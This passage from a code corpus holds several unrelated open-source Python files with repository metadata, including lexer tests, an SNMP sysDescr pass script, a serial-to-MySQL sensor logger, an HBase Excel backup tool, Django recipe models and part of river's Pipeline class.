client_raw_response = models.TldLegalAgreementPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
| 42.780702
| 144
| 0.64107
|
57d4293119434933890062351231051c24898e74
| 3,038
|
py
|
Python
|
tests/test_lexer.py
|
rolandmueller/rita-dsl
|
d0457fcf220baaf7fa8f647bab36b5ff5ea9367b
|
[
"MIT"
] | 66
|
2019-07-17T05:23:04.000Z
|
2022-03-15T12:06:06.000Z
|
tests/test_lexer.py
|
rolandmueller/rita-dsl
|
d0457fcf220baaf7fa8f647bab36b5ff5ea9367b
|
[
"MIT"
] | 90
|
2019-07-18T10:21:13.000Z
|
2021-11-09T19:54:57.000Z
|
tests/test_lexer.py
|
rolandmueller/rita-dsl
|
d0457fcf220baaf7fa8f647bab36b5ff5ea9367b
|
[
"MIT"
] | 3
|
2020-08-20T06:57:11.000Z
|
2022-03-03T16:11:45.000Z
|
from rita.lexer import RitaLexer
def test_tokenize_any_macro_wo_args_wo_type():
lex = RitaLexer()
lex.build()
tokens = list(lex.tokenize("ANY"))
assert len(tokens) == 1
token = tokens[0]
assert token.type == "KEYWORD"
assert token.value == "ANY"
def test_tokenize_any_macro_wo_args_w_type():
lex = RitaLexer()
lex.build()
tokens = list(lex.tokenize('ANY -> MARK("Placeholder")'))
assert len(tokens) == 6
t0 = tokens[0]
assert t0.type == "KEYWORD"
assert t0.value == "ANY"
assert tokens[1].type == "ARROW"
t2 = tokens[2]
assert t2.type == "KEYWORD"
assert t2.value == "MARK"
t3 = tokens[4]
assert t3.type == "LITERAL"
assert t3.value == "Placeholder"
def test_tokenize_assign_literal():
lex = RitaLexer()
lex.build()
tokens = list(lex.tokenize('Test = "Test"'))
assert len(tokens) == 3
assert tokens[0].type == "NAME"
assert tokens[1].type == "ASSIGN"
assert tokens[2].type == "LITERAL"
def test_tokenize_assign_macro():
lex = RitaLexer()
lex.build()
tokens = list(lex.tokenize('Test = WORD("Test")'))
assert len(tokens) == 6
assert tokens[0].type == "NAME"
assert tokens[1].type == "ASSIGN"
assert tokens[2].type == "KEYWORD"
assert tokens[4].type == "LITERAL"
def test_tokenize_exec_macro():
lex = RitaLexer()
lex.build()
tokens = list(lex.tokenize('!IMPORT("module.test")'))
assert len(tokens) == 5
assert tokens[0].type == "EXEC"
assert tokens[1].type == "KEYWORD"
assert tokens[3].type == "LITERAL"
def test_tokenize_two_exec_macros():
lex = RitaLexer()
lex.build()
tokens = list(
lex.tokenize(
"""
!CONFIG("setting.1", "1")
!CONFIG("setting.2", "0")
"""
)
)
assert len(tokens) == 14
assert tokens[0].type == "EXEC"
assert tokens[1].type == "KEYWORD"
assert tokens[3].type == "LITERAL"
assert tokens[5].type == "LITERAL"
assert tokens[7].type == "EXEC"
assert tokens[8].type == "KEYWORD"
assert tokens[10].type == "LITERAL"
assert tokens[12].type == "LITERAL"
def test_tokenize_list_w_one_item():
lex = RitaLexer()
lex.build()
tokens = list(
lex.tokenize(
"""
members = { "first" }
"""
)
)
assert tokens[0].type == "NAME"
assert tokens[1].type == "ASSIGN"
assert tokens[3].type == "LITERAL"
def test_tokenize_variable_w_escape():
lex = RitaLexer()
lex.build()
tokens = list(
lex.tokenize(r'WORD("Hello \"World\"") -> MARK("GREETING")')
)
print(tokens[2])
assert tokens[0].type == "KEYWORD"
assert tokens[2].type == "LITERAL"
assert tokens[4].type == "ARROW"
assert tokens[5].type == "KEYWORD"
def test_pattern_in_variable():
lex = RitaLexer()
lex.build()
tokens = list(
lex.tokenize(r'COMPLEX_NUMBER = {NUM+, WORD("/")?, NUM}')
)
assert len(tokens) == 14
| 21.7
| 68
| 0.580645
|
ce628f6b73038d25734b518f198268fdc0f3418b
| 3,550
|
py
|
Python
|
src/sonic_ax_impl/bin/sysDescr_pass.py
|
RayWang910012/sonic-snmpagent
|
701ec1aba1b92f9d850c9227b9b1185b53ebad27
|
[
"Apache-2.0"
] | 13
|
2016-03-09T20:38:16.000Z
|
2021-02-04T17:39:27.000Z
|
src/sonic_ax_impl/bin/sysDescr_pass.py
|
RayWang910012/sonic-snmpagent
|
701ec1aba1b92f9d850c9227b9b1185b53ebad27
|
[
"Apache-2.0"
] | 167
|
2017-02-01T23:16:11.000Z
|
2022-03-31T02:22:08.000Z
|
src/sonic_ax_impl/bin/sysDescr_pass.py
|
xumia/sonic-snmpagent
|
4e063e4ade89943f2413a767f24564aecfa2cd1c
|
[
"Apache-2.0"
] | 89
|
2016-03-09T20:38:18.000Z
|
2022-03-09T09:16:13.000Z
|
#! /usr/bin/python3 -u
#################################################################################
# Copyright 2016 Cumulus Networks LLC, all rights reserved
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston,
# MA 02111-1307, USA.
#################################################################################
# This is a simple pass through script that
# returns only one OID, the Linux Distribution and Kernel Version
# as the systemDescription.
#
# To activate, you would need to place this
# script in /usr/share/snmp/sysDescr_pass.py
# and include this path along with the following
# in /etc/snmp/snmpd.conf (note the -p 10 to raise the priority)
# pass -p 10 .1.3.6.1.2.1.1.1 /usr/share/snmp/sysDescr_pass.py
#
# snmpd will call this script with either -g or -n and an OID
# This can be tested simply by calling the script
#
# ./sysDescr_pass.py -g .1.3.6.1.2.1.1.1.0
# ./sysDescr_pass.py -n .1.3.6.1.2.1.1.1
#
# should return meaningful information. Everything else
# should return nothing.
#
# When tested on a recent Debian system, we get this:
#
# # snmpget -v2c -cpublic localhost .1.3.6.1.2.1.1.1
# SNMPv2-MIB::sysDescr.0 = STRING: Debian 8.4 (Linux Kernel 3.16.7-ckt25-1)
#
#
import sys
import logging
import traceback
# configure logging
logger = logging.getLogger(__name__)
logger.addHandler(logging.StreamHandler(sys.stdout))
logger.setLevel(logging.INFO)
# this is the one oid
myoid = '.1.3.6.1.2.1.1.1.0'
# and the version without the .0
myoidsub1 = '.1.3.6.1.2.1.1.1'
if len(sys.argv) < 3:
# we must be called with either -g or -n
# and an oid
sys.stdout.flush()
sys.exit()
command = sys.argv[1]
oid = sys.argv[2]
if command == '-n' and oid != myoidsub1:
# after our OID, there is nothing
sys.stdout.flush()
sys.exit()
elif command == '-s':
logger.error("set: oid not writeable")
sys.stdout.flush()
sys.exit()
elif command == '-g' and oid != myoid:
sys.stdout.flush()
sys.exit()
filepath = "/etc/ssw/sysDescription"
sysDescription = "SONiC (unknown version) - HwSku (unknown) - Distribution (unknown) - Kernel (unknown)"
try:
with open(filepath) as f:
lines = f.readlines()
sysDescription = lines[0]
except (OSError, IOError):
logger.exception("Unable to access file {}".format(filepath))
except IndexError:
logger.exception("unable to read lines from {}, possible empty file?".format(filepath))
except Exception:
logger.exception("Uncaught exception in {}".format(filepath))
logger.error(repr(traceback.extract_stack()))
# We simply have only one object to print.
# we are passed a -g or -n for get or getnext
# snmpd will not call us with a get unless the oid
# is correct (the .0 on the end can be ignored).
# also, when called with a getnext, we checked the oid
# above so we know it is myoidsub1 for the getnext.
print("%s\nSTRING\n%s" % (myoid, sysDescription))
sys.stdout.flush()
| 31.696429
| 104
| 0.676056
|
8b0b587e6aac13144a399107fa63de1831d89c61
| 2,082
|
py
|
Python
|
client-app/client-app.py
|
realmoriss/grow4u
|
ac507ec3eeb376e2b89de0b9d031c69edf3d9195
|
[
"MIT"
] | null | null | null |
client-app/client-app.py
|
realmoriss/grow4u
|
ac507ec3eeb376e2b89de0b9d031c69edf3d9195
|
[
"MIT"
] | null | null | null |
client-app/client-app.py
|
realmoriss/grow4u
|
ac507ec3eeb376e2b89de0b9d031c69edf3d9195
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import sys
import serial
import io
import datetime
import time
import pymysql
def readCmd(sio: io.TextIOWrapper, cmd: str):
dt_out = sio.write(cmd + "\n")
sio.flush()
if dt_out==0:
raise Exception("Unable to write to device.")
if sio.readline().strip()!=cmd:
raise Exception("Device is not responding.")
return sio.readline().strip()
def main():
db_host = ""
db_user = ""
db_pass = ""
db_name = ""
db_charset = "utf8mb4"
db = pymysql.connect(host=db_host, user=db_user, password=db_pass,
db=db_name, charset=db_charset, cursorclass=pymysql.cursors.DictCursor)
try:
ser = serial.Serial(port="/dev/ttyACM0", baudrate=38400, timeout=1)
except Exception as e:
print("Unable to connect to serial port: " + str(e))
sys.exit(1)
ser.flushInput()
ser.flushOutput()
try:
# The buffer size should be set to 1 for both BufferedRWPair and TextIOWrapper
# see issue: https://stackoverflow.com/a/27894482
sio = io.TextIOWrapper(io.BufferedRWPair(ser, ser, 1), encoding="ascii")
sio._CHUNK_SIZE = 1
print("Started logging...")
with db.cursor() as cursor:
create_table_cmd = "CREATE TABLE IF NOT EXISTS `sensor_log` (`id` INT NOT NULL AUTO_INCREMENT, `date` DATETIME, `temp` FLOAT, `hum` FLOAT, `soil` FLOAT, PRIMARY KEY (`id`))"
cursor.execute(create_table_cmd)
db.commit()
with db.cursor() as cursor:
insert_cmd = "INSERT INTO `sensor_log` (`date`, `temp`, `hum`, `soil`) VALUES (%s, %s, %s, %s)"
while True:
cursor.execute(insert_cmd, (datetime.datetime.now().isoformat(), readCmd(sio, "temp"), readCmd(sio, "hum"), readCmd(sio, "soil")))
db.commit()
time.sleep(10)
except Exception as e:
print("Error while communicating: " + str(e))
except KeyboardInterrupt:
print("Bye.")
finally:
db.close()
if __name__ == "__main__":
main()
| 31.545455
| 185
| 0.604227
|
b4c564c286d735c965066d58ac400b21841dba54
| 1,600
|
py
|
Python
|
_GTW/_OMP/_DNS/UI_Spec.py
|
Tapyr/tapyr
|
4235fba6dce169fe747cce4d17d88dcf4a3f9f1d
|
[
"BSD-3-Clause"
] | 6
|
2016-12-10T17:51:10.000Z
|
2021-10-11T07:51:48.000Z
|
_GTW/_OMP/_DNS/UI_Spec.py
|
Tapyr/tapyr
|
4235fba6dce169fe747cce4d17d88dcf4a3f9f1d
|
[
"BSD-3-Clause"
] | null | null | null |
_GTW/_OMP/_DNS/UI_Spec.py
|
Tapyr/tapyr
|
4235fba6dce169fe747cce4d17d88dcf4a3f9f1d
|
[
"BSD-3-Clause"
] | 3
|
2020-03-29T07:37:03.000Z
|
2021-01-21T16:08:40.000Z
|
# -*- coding: utf-8 -*-
# Copyright (C) 2012-2015 Dr. Ralf Schlatterbeck All rights reserved
# Reichergasse 131, A-3411 Weidling, Austria. rsc@runtux.com
# ****************************************************************************
# This module is part of the package GTW.OMP.DNS.
#
# This module is licensed under the terms of the BSD 3-Clause License
# <http://www.c-tanzer.at/license/bsd_3c.html>.
# ****************************************************************************
#
#++
# Name
# GTW.OMP.DNS.UI_Spec
#
# Purpose
# UI specification for E_Types defined by GTW.OMP.DNS
#
# Revision Dates
# 6-Sep-2012 (RS) Creation
# 16-Dec-2015 (CT) Change to `UI_Spec`
# ««revision-date»»···
#--
from _GTW import GTW
from _TFL import TFL
import _GTW._OMP._DNS
import _TFL.Sorted_By
class UI_Spec (object) :
"""UI specification for E_Types defined by GTW.OMP.DNS"""
AAAA_Record = dict \
(
)
A_Record = dict \
(
)
CNAME_Record = dict \
(
)
MX_Record = dict \
(
)
NS_Record = dict \
(
)
Secondary_IP4 = dict \
(
)
Secondary_IP6 = dict \
(
)
SRV_Record = dict \
(
)
TXT_Record = dict \
(
)
Zone = dict \
(
)
# end class UI_Spec
if __name__ != "__main__" :
GTW.OMP.DNS._Export ("UI_Spec")
### __END__ GTW.OMP.DNS.UI_Spec
| 20.253165
| 78
| 0.453125
|
9d8fe33d2697e6d6b12b4601e6c6a486454a5264
| 1,438
|
py
|
Python
|
tests/test_005_add_items_to_list.py
|
Sudipta96/AnyDo-Web-UI-Automation
|
207aa3240a0bbdb6839e43c470258597efd95e44
|
[
"MIT"
] | null | null | null |
tests/test_005_add_items_to_list.py
|
Sudipta96/AnyDo-Web-UI-Automation
|
207aa3240a0bbdb6839e43c470258597efd95e44
|
[
"MIT"
] | null | null | null |
tests/test_005_add_items_to_list.py
|
Sudipta96/AnyDo-Web-UI-Automation
|
207aa3240a0bbdb6839e43c470258597efd95e44
|
[
"MIT"
] | null | null | null |
from tests.base_test import BaseTest
from configurations.config import TestData, Test_Data_005
from pages.login_page import LoginPage
from pages.add_items_to_list import AddItemsToListPage
from utils.customLogger import LogGeneration
import time
class Test_005_AddItemsToList(BaseTest):
username = TestData.username
password = TestData.password
listname = Test_Data_005.listname
list_items = Test_Data_005.list_items
logger= LogGeneration.loggen()
def test_add_items_to_list(self):
self.logger.info("*****Add Items To List Test******")
self.logger.info("****Login process initializing ****")
self.lp=LoginPage(self.driver)
self.lp.login(self.username, self.password)
self.logger.info("****Login successfull ****")
time.sleep(5)
self.logger.info("****Started Adding Items to List******")
self.obj = AddItemsToListPage(self.driver)
self.obj.collapse_list_menu()
time.sleep(3)
self.obj.click_list_item()
self.obj.enter_taskname(self.list_items)
items_visibility = self.obj.check_items_visibility(self.list_items)
if items_visibility == True:
self.logger.info("****Adding Items to List passed******")
assert True
else:
self.logger.info("****Adding Items to List failed******")
assert False
| 29.958333
| 75
| 0.648122
|
0d9387ad5e0500460f0d58ba5a6bf478bbb8934d
| 9,850
|
py
|
Python
|
hbase_script.py
|
abhishekzgithub/hbase
|
05aad6188a42c897ef38b5a56c85b1bb0725de3a
|
[
"MIT"
] | null | null | null |
hbase_script.py
|
abhishekzgithub/hbase
|
05aad6188a42c897ef38b5a56c85b1bb0725de3a
|
[
"MIT"
] | null | null | null |
hbase_script.py
|
abhishekzgithub/hbase
|
05aad6188a42c897ef38b5a56c85b1bb0725de3a
|
[
"MIT"
] | null | null | null |
import happybase
import pandas as pd
import os,time
import datetime
timenow=datetime.datetime.now().strftime("%y-%m-%d-%H-%M")
hbaseip = input("Please provide the IP ADDRESS of the hbase==-->")
namespace = input("NAMESPACE of the hbase==-->")
encoding = 'utf-8'
filepath=os.getcwd()
filename=namespace+"_data.xlsx"
def convert_scan_data_to_list(h_data, is_col_family_included=False):
"""
Converts hbase data to list of dictionaries
:param h_data: Object returned from table.scan function
:param is_col_family_included: Flag for adding column family in returned data
:return: List
"""
temp_list = []
try:
for row_key, vals in h_data:
value_dict = {}
key_name = (row_key.decode(encoding), vals)[0]
key_vals = (row_key.decode(encoding), vals)[1]
value_dict['row_key'] = key_name
for keys, items in key_vals.items():
if is_col_family_included:
names = keys
else:
names = keys.decode(encoding).split(':')[1]
value_dict[names] = items.decode(encoding)
temp_list.append(value_dict)
except Exception as e:
print(e)
return temp_list
def convert_scan_data_to_df(h_data, is_col_family_included=False):
"""
    Converts hbase data to DataFrame (a minimal illustration, _example_conversion, follows these helpers)
:param h_data: Object returned from table.scan function
:param is_col_family_included: Flag for adding column family in returned data
:return: DataFrame
"""
temp_list = convert_scan_data_to_list(h_data, is_col_family_included)
df = pd.DataFrame(temp_list)
return df
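# Editor's illustrative sketch, not part of the original script: happybase's
# table.scan() yields (row_key, cells) pairs whose keys and values are bytes,
# e.g. (b'row-1', {b'cf1:temp': b'21.5'}). The function below shows what the
# two converters above produce for such input; it is defined only for
# illustration and is never called by this script.
def _example_conversion():
    sample_scan = [
        (b'row-1', {b'cf1:temp': b'21.5', b'cf1:hum': b'40'}),
    ]
    as_list = convert_scan_data_to_list(sample_scan)
    # -> [{'row_key': 'row-1', 'temp': '21.5', 'hum': '40'}]
    as_df = convert_scan_data_to_df(sample_scan)
    # -> a one-row DataFrame with string-valued columns: row_key, temp, hum
    return as_list, as_df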
def get_table_details(table_name=None, filter1=None, col=None, del_data=False, df_conv=False):
conn = happybase.Connection(hbaseip, table_prefix=namespace, table_prefix_separator=":",
autoconnect=False)
conn.open()
table_data = conn.table(table_name)
data = table_data.scan(columns=col, filter=filter1)
if df_conv == True:
df = convert_scan_data_to_df(data,is_col_family_included=True)
if conn:
conn.close()
return df
def get_all_table_list(local_list=False):
conn = happybase.Connection(hbaseip, table_prefix=namespace, table_prefix_separator=":",
autoconnect=False)
conn.open()
if local_list:
table_list_all=tab_list_ccpa
else:
table_list_all = [i.decode('utf-8') for i in conn.tables()]
if conn:
conn.close()
return table_list_all
def get_all_data(backup=False):
try:
print("saving data started")
dfc = {}
if backup:
writer = pd.ExcelWriter(filepath+r"\\"+"bk_"+timenow+"_"+filename)
else:
writer = pd.ExcelWriter(filepath+r"\\"+filename,engine='openpyxl')
table_list_all=get_all_table_list()
for i in range(len(table_list_all)):
dfc[i] = get_table_details(df_conv=True,
table_name=table_list_all[i])
dfc[i].to_excel(writer, sheet_name=table_list_all[i], index=False,encoding=encoding)
writer.save()
except Exception as e:
print("exception in get all data",e)
finally:
print("excel file {0} is saved in below location\n {1} ".format(filename,filepath))
class HbaseOperation(object):
def __init__(self,tablename=None):
self.tab=tablename
self.conn = happybase.Connection(hbaseip, table_prefix=namespace, table_prefix_separator=":",
autoconnect=False)
self.conn.open()
get_all_data(backup=True)
def _create_hbasetable(self):
"""
# tablename='mytable1'
# colfam={'cf1': dict()}
# dict_name_family={tablename:colfam}
#(create_hbasetable(dict_name_family))
:param dict_name_family:
:return:
"""
print("creation of tables started")
if self.tab == None:
for i in range(len(tab_cf)):
for table_name,colfam in tab_cf[i].items():
print("Table {0} is created".format(table_name))
try:
self.conn.create_table(name=table_name,families=colfam)
except Exception as e:
continue
else:
fam=[val for i in range(len(tab_cf)) for key, val in tab_cf[i].items() if key == self.tab][0]
print("Table {0} is created".format(self.tab))
self.conn.create_table(name=self.tab, families=fam)
print("creation of tables ended")
#self.conn.close()
def _delete_hbasetable(self,local_list=False):
print("deletion of tables started")
tablename_list=get_all_table_list(local_list=local_list)
#if True:#eval(input("Press '1234567' to delete all data\n"))==1234567:
if self.tab == None:
for i in tablename_list:
print(("table {0} deleted").format(i))
try:
self.conn.delete_table(name=i,disable=True)
except Exception as e:
continue
else:
self.conn.delete_table(name=self.tab, disable=True)
print(("table {0} deleted").format(self.tab))
#self.conn.close()
flag = False
print("deletion of tables ended")
def _delete_keydata_hbase(self):
"""safe delete"""
if self.tab!=None:
print("updating the {} table".format(self.tab))
table_data=self.conn.table(self.tab)
data=table_data.scan()
for key, val in data:
if key:
table_data.delete(key)
else:
raise SystemError("a table input is required for this operation")
def insert_data(self):
print("insertion of data in tables started")
if not os.path.exists(filepath+r'\\'+filename):
raise ValueError(("file {0} doesnt exist in the path {1}").format(filename,filepath))
else:
file=filepath+r'\\'+filename
if self.tab == None:
sheet_list = pd.ExcelFile(file).sheet_names
for i in range(len(sheet_list)):
print("Table {0} is being inserted ".format(sheet_list[i]))
table = self.conn.table(sheet_list[i])
df = pd.read_excel(file, sheet_name=sheet_list[i])
df_rowkey = df['row_key'].astype('str')
df_data = df.drop(['row_key'], axis=1).astype('str')
with table.batch(transaction=True) as b:
for x in range(df.shape[0]):
rk = df_rowkey.iloc[x]
data = df_data.iloc[x, :].to_dict()
b.put(rk, data)
else:
sheet_list=self.tab
print("Table {0} is being inserted ".format(sheet_list))
table = self.conn.table(sheet_list)
df = pd.read_excel(file, sheet_name=sheet_list)
df_rowkey = df['row_key'].astype('str')
df_data = df.drop(['row_key'], axis=1).astype('str')
with table.batch(transaction=True) as b:
for x in range(df.shape[0]):
rk = df_rowkey.iloc[x]
data = df_data.iloc[x, :].to_dict()
b.put(rk, data)
#self.conn.close()
time.sleep(2)
get_all_data(backup=False)
print("insertion of data in tables ended")
def get_cf_table(self):
sheet_list = pd.ExcelFile(filename).sheet_names
dict_name_family = dict()
for i in range(len(sheet_list)):
table = self.conn.table(sheet_list[i])
fam=table.families()
cf=[k for k in fam.keys()][0].decode('utf-8')
dict_name_family[i]={
sheet_list[i]:{
cf:dict()
}
}
self.conn.close()
#print(list(dict_name_family.values()))
if __name__ == "__main__":
while True:
var=int(input("Press 1 to create backup of data\n"
"Press 2 to download data which will be later used for upload after edit\n"
"Press 3 to upload the appended data. A default backup of previous data will be saved.\n"
"Press 4 to completely update the data from the excel\n"
"Press 5 to update specific table/sheet\n"
"Press 6 for safe update(time taking)\n"
"Press 10 to exit this loop\n--->"))
if var == 10:
raise SystemExit("You pressed 10 to exit")
elif var == 1:
get_all_data(backup=True)
elif var == 2:
get_all_data(backup=False)
elif var == 3:
hbo = HbaseOperation()
hbo.insert_data()
time.sleep(4)
get_all_data()
elif var == 4:
hbo = HbaseOperation()
hbo._delete_hbasetable()
time.sleep(4)
hbo1=HbaseOperation()
hbo1._create_hbasetable()
hbo2=HbaseOperation()
hbo2.insert_data()
elif var == 5:
tabname=str(input("Please enter the sheet/table name for update\n-->"))
hbo=HbaseOperation(tabname)
hbo._delete_hbasetable()
time.sleep(2)
hbo._create_hbasetable()
hbo.insert_data()
elif var == 6:
tabname = str(input("Please enter the sheet/table name for update\n-->"))
hbo = HbaseOperation(tabname)
hbo._delete_keydata_hbase()
time.sleep(2)
hbo.insert_data()
| 38.779528
| 107
| 0.564264
|
de4c2ae95fa21dae4aa25c0e57b59bf17c34e470
| 2,580
|
py
|
Python
|
app/core/models.py
|
nimkh1987/recipe-app-api
|
5347379095dc917023e7d1e2a5444c00075591d8
|
[
"MIT"
] | null | null | null |
app/core/models.py
|
nimkh1987/recipe-app-api
|
5347379095dc917023e7d1e2a5444c00075591d8
|
[
"MIT"
] | null | null | null |
app/core/models.py
|
nimkh1987/recipe-app-api
|
5347379095dc917023e7d1e2a5444c00075591d8
|
[
"MIT"
] | null | null | null |
import uuid
import os
from django.db import models
from django.contrib.auth.models import AbstractBaseUser, \
BaseUserManager, PermissionsMixin
from django.conf import settings
def recipe_image_file_path(instance, filename):
"""Generate file path for new recipe image"""
ext = filename.split('.')[-1]
filename = f'{uuid.uuid4()}.{ext}'
return os.path.join('uploads/recipe/', filename)
class UserManager(BaseUserManager):
def create_user(self, email, password=None, **extra_fields):
"""Creates and saves a new user"""
if not email:
raise ValueError('User must have an email address')
user = self.model(email=self.normalize_email(email), **extra_fields)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, email, password):
"""Creates and saves a new superuser"""
user = self.create_user(email, password)
user.is_staff = True
user.is_superuser = True
user.save(using=self._db)
return user
class User(AbstractBaseUser, PermissionsMixin):
"""Custom user model that supports using email instead of username"""
email = models.EmailField(max_length=255, unique=True)
name = models.CharField(max_length=255)
is_active = models.BooleanField(default=True)
is_staff = models.BooleanField(default=False)
objects = UserManager()
USERNAME_FIELD = 'email'
class Tag(models.Model):
"""Tag to be used with recipe"""
name = models.CharField(max_length=255)
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
)
def __str__(self):
return self.name
class Ingredient(models.Model):
"""INgredients to be used in a recipe"""
name = models.CharField(max_length=255)
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
)
def __str__(self):
return self.name
class Recipe(models.Model):
"""Recipe object"""
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE
)
title = models.CharField(max_length=255)
time_minutes = models.IntegerField()
price = models.DecimalField(max_digits=5, decimal_places=2)
link = models.CharField(max_length=255, blank=True)
ingredients = models.ManyToManyField('Ingredient')
tags = models.ManyToManyField('Tag')
image = models.ImageField(null=True, upload_to=recipe_image_file_path)
def __str__(self):
return self.title
| 28.351648
| 76
| 0.682171
|
45a47899246694816554ef65ba2b7453737665cf
| 63
|
py
|
Python
|
hello.py
|
sabbate/cs3240-labdemo
|
d4e9a57eb494b028eff1c0400a54d2ac65785bd7
|
[
"MIT"
] | null | null | null |
hello.py
|
sabbate/cs3240-labdemo
|
d4e9a57eb494b028eff1c0400a54d2ac65785bd7
|
[
"MIT"
] | null | null | null |
hello.py
|
sabbate/cs3240-labdemo
|
d4e9a57eb494b028eff1c0400a54d2ac65785bd7
|
[
"MIT"
] | null | null | null |
from helper import greeting
greeting("Hello from hello.py");
| 21
| 32
| 0.761905
|
202b5616ed8fda6092551f20607f9b7606a81173
| 25,306
|
py
|
Python
|
river/compose/pipeline.py
|
dataJSA/river
|
93497bba53d11d21e862acfd656b3fba7cf05c9b
|
[
"BSD-3-Clause"
] | null | null | null |
river/compose/pipeline.py
|
dataJSA/river
|
93497bba53d11d21e862acfd656b3fba7cf05c9b
|
[
"BSD-3-Clause"
] | null | null | null |
river/compose/pipeline.py
|
dataJSA/river
|
93497bba53d11d21e862acfd656b3fba7cf05c9b
|
[
"BSD-3-Clause"
] | null | null | null |
import collections
import contextlib
import functools
import io
import itertools
import types
import typing
from xml.etree import ElementTree as ET
import pandas as pd
from river import base, utils
from . import func, union
__all__ = ["Pipeline"]
@contextlib.contextmanager
def warm_up_mode():
"""A context manager for training pipelines during a warm-up phase.
You don't have to worry about anything when you call `predict_one` and `learn_one` with a
pipeline during in a training loop. The methods at each step of the pipeline will be called in
the correct order.
However, during a warm-up phase, you might just be calling `learn_one` because you don't need
the out-of-sample predictions. In this case the unsupervised estimators in the pipeline won't
be updated, because they are usually updated when `predict_one` is called.
This context manager allows you to override that behavior and make it so that unsupervised
estimators are updated when `learn_one` is called.
Examples
--------
Let's first see what methods are called if we just call `learn_one`.
>>> import io
>>> import logging
>>> from river import anomaly
>>> from river import compose
>>> from river import datasets
>>> from river import preprocessing
>>> from river import utils
>>> model = compose.Pipeline(
... preprocessing.MinMaxScaler(),
... anomaly.HalfSpaceTrees()
... )
>>> class_condition = lambda x: x.__class__.__name__ in ('MinMaxScaler', 'HalfSpaceTrees')
>>> logger = logging.getLogger()
>>> logger.setLevel(logging.DEBUG)
>>> logs = io.StringIO()
>>> sh = logging.StreamHandler(logs)
>>> sh.setLevel(logging.DEBUG)
>>> logger.addHandler(sh)
>>> with utils.log_method_calls(class_condition):
... for x, y in datasets.CreditCard().take(1):
... model = model.learn_one(x)
>>> print(logs.getvalue())
MinMaxScaler.transform_one
HalfSpaceTrees.learn_one
Now let's use the context manager and see what methods get called.
>>> logs = io.StringIO()
>>> sh = logging.StreamHandler(logs)
>>> sh.setLevel(logging.DEBUG)
>>> logger.addHandler(sh)
>>> with utils.log_method_calls(class_condition), utils.warm_up_mode():
... for x, y in datasets.CreditCard().take(1):
... model = model.learn_one(x)
>>> print(logs.getvalue())
MinMaxScaler.learn_one
MinMaxScaler.transform_one
HalfSpaceTrees.learn_one
We can see that the scaler got updated before transforming the data.
"""
Pipeline._WARM_UP = True
try:
yield
finally:
Pipeline._WARM_UP = False
@contextlib.contextmanager
def pure_inference_mode():
"""A context manager for making inferences with no side-effects.
Calling `predict_one` with a pipeline will update the unsupervised steps of the pipeline. This
is the expected behavior for online machine learning. However, in some cases you might just
want to produce predictions without necessarily updating anything.
This context manager allows you to override that behavior and make it so that unsupervised
estimators are not updated when `predict_one` is called.
Examples
--------
Let's first see what methods are called if we just call `predict_one`.
>>> import io
>>> import logging
>>> from river import compose
>>> from river import datasets
>>> from river import linear_model
>>> from river import preprocessing
>>> from river import utils
>>> model = compose.Pipeline(
... preprocessing.StandardScaler(),
... linear_model.LinearRegression()
... )
>>> class_condition = lambda x: x.__class__.__name__ in ('StandardScaler', 'LinearRegression')
>>> logger = logging.getLogger()
>>> logger.setLevel(logging.DEBUG)
>>> logs = io.StringIO()
>>> sh = logging.StreamHandler(logs)
>>> sh.setLevel(logging.DEBUG)
>>> logger.addHandler(sh)
>>> with utils.log_method_calls(class_condition):
... for x, y in datasets.TrumpApproval().take(1):
... _ = model.predict_one(x)
>>> print(logs.getvalue())
StandardScaler.learn_one
StandardScaler.transform_one
LinearRegression.predict_one
Now let's use the context manager and see what methods get called.
>>> logs = io.StringIO()
>>> sh = logging.StreamHandler(logs)
>>> sh.setLevel(logging.DEBUG)
>>> logger.addHandler(sh)
>>> with utils.log_method_calls(class_condition), utils.pure_inference_mode():
... for x, y in datasets.TrumpApproval().take(1):
... _ = model.predict_one(x)
>>> print(logs.getvalue())
StandardScaler.transform_one
LinearRegression.predict_one
We can see that the scaler did not get updated before transforming the data.
"""
Pipeline._STATELESS = True
try:
yield
finally:
Pipeline._STATELESS = False
class Pipeline(base.Estimator):
"""A pipeline of estimators.
Pipelines allow you to chain different steps into a sequence. Typically, when doing supervised
    learning, a pipeline contains one or more transformation steps, whilst its last step is a regressor or
a classifier. It is highly recommended to use pipelines with `river`. Indeed, in an online
learning setting, it is very practical to have a model defined as a single object. Take a look
at the [user guide](../../recipes/pipelines.md) for further information and
practical examples.
    One special thing to take notice of is the way transformers are handled. It is usual to predict
something for a sample and wait for the ground truth to arrive. In such a scenario, the
features are seen before the ground truth arrives. Therefore, the unsupervised parts of the
pipeline are updated when `predict_one` and `predict_proba_one` are called. Usually the
unsupervised parts of the pipeline are all the steps that precede the final step, which is a
supervised model. However, some transformers are supervised and are therefore also updated
during calls to `learn_one`.
Parameters
----------
steps
Ideally, a list of (name, estimator) tuples. A name is automatically inferred if none is
provided.
Examples
--------
The recommended way to declare a pipeline is to use the `|` operator. The latter allows you
to chain estimators in a very terse manner:
>>> from river import linear_model
>>> from river import preprocessing
>>> scaler = preprocessing.StandardScaler()
>>> log_reg = linear_model.LinearRegression()
>>> model = scaler | log_reg
This results in a pipeline that stores each step inside a dictionary.
>>> model
Pipeline (
StandardScaler (
with_std=True
),
LinearRegression (
optimizer=SGD (
lr=Constant (
learning_rate=0.01
)
)
loss=Squared ()
l2=0.
l1=0.
intercept_init=0.
intercept_lr=Constant (
learning_rate=0.01
)
clip_gradient=1e+12
initializer=Zeros ()
)
)
You can access parts of a pipeline in the same manner as a dictionary:
>>> model['LinearRegression']
LinearRegression (
optimizer=SGD (
lr=Constant (
learning_rate=0.01
)
)
loss=Squared ()
l2=0.
l1=0.
